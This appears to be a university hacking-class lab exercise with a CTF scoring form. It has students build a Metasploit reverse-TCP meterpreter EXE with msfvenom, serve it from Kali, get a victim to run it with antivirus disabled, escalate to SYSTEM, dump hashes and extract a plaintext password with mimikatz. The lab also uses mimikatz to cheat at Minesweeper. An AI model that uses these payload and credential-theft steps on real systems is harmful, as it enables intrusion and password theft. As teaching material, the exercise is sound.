4.1: Mimikatz (15 pts. extra credit)

What You Need


We will use Kali Linux and Metasploit to create a an infectious EXE file.

A user who runs that file surrenders control of their computer.

Finding the Attacker's IP Address

On your Linux machine, in a Terminal window, execute this command:
Find your IP address and make a note of it. In the example below, it is

Using Msfvenom to Make a Malicious EXE

In Kali, execute this command to learn about msfvenom, which is part of Metasploit.
msfvenom -h
A help message appears, as shown below.

In Kali, execute these commands to create a malicious Windows executable file named "fun.exe" and serve it from a malicious Web server.

Adjust the IP address to match the IP address of your Kali machine (the C&C server).

msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe > /var/www/html/fun.exe
service apache2 start
The operation proceeds without errors, as shown below.


If msfvemon crashes on a line in the "android.rb" file, try editing that file and viewing that line. It may define a certificate that is valid for 20 years. Delete the "0" to make it valid for only 2 years to fix the error.

Another workaround is to use 64-bit Kali; msfvenom works better on that OS.

Launching Msfconsole

In Kali, execute this command to start msfconsole, the main control system for Metasploit.
Metasploit launches, as shown below.

In Kali, at the msf> prompt, execute this command.

Several pages of help scroll by. The section we'll use is "Module commands", as shown below.

Starting a Command-and-Control (C&C) Server

Execute these commands to start a C&C listener.
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
Metasploit starts a "reverse TCP handler", as shown below.

Putting a Password on the Target Machine

On the target Windows machine, click Start, "Control Panel", "User Accounts", "Change your Windows password", "Create a password for your account".

Enter a password of P@ssw0rd in both the password boxes, as shown below.

Click the "Create password" button.

Running the Malware on the Target Machine

On the target Windows machine, open a Web browser and open this URL, replacing the IP address with the IP address of your Kali machine:
The file "fun.exe" downloads. Bypass any warning boxes, double-click the file, and allow it to run.

Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender. If you have problems disabling your malware protection, use the Windows 2008 Server virtual machine, which has no malware protection.

On your Kali machine, a meterpeter session opens, as shown below.

Privilege Escalation and Stealing Password Hashes

On your Kali machine, at meterpreter > prompt, execute this command:
As shown below, we have Administrator privileges.

To steal the plaintext password from memory, we need to run as SYSTEM, which is more powerful than the Administrator account.

On your Kali machine, at meterpreter > prompt, execute these commands:

"getuid" reports that you have SYSTEM privileges now, as shown below.

On your Kali machine, at meterpreter > prompt, execute this command:

You see password hashes, as shown below.

Stealing a Plaintext Password

We could try to crack those hashes to get passwords, but that might be a lot of work.

Fortunately, Windows stores the password of the currently logged-on user in RAM in a reversibly encrypted form, so we can steal it directly :).

On your Kali machine, at meterpreter > prompt, execute these commands:

load mimikatz
The plaintext password is revealed, as highlighted in the image below!

Winning at Minesweeper

On your host system, in a Web browser, go to


Click DOWNLOAD. A Winmine__XP.exe file downloads.

Rename this file to winmine.exe

Drag the winmine.exe file into your Windows machine and run it, as shown below.

This is a game in which you must click on the empty squares, avoiding the squares that contain mines.

On your Kali machine, at meterpreter > prompt, execute these commands:

mimikatz_command -f winmine::infos
Mimikatz reads the locations of the mines from RAM and displays them, as shown below.

Play the game and win it, using the information from Mimikatz.

When you win, you see the screen below. Part of the message is redacted in the image below.

4x Recording Your Success

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:
Message text:

e> Updated 5-23-18 to run as a CTF
Slight changes 6-4-18
Android.rb fix added 6-14-18
Integrated with Canvas 6-27-18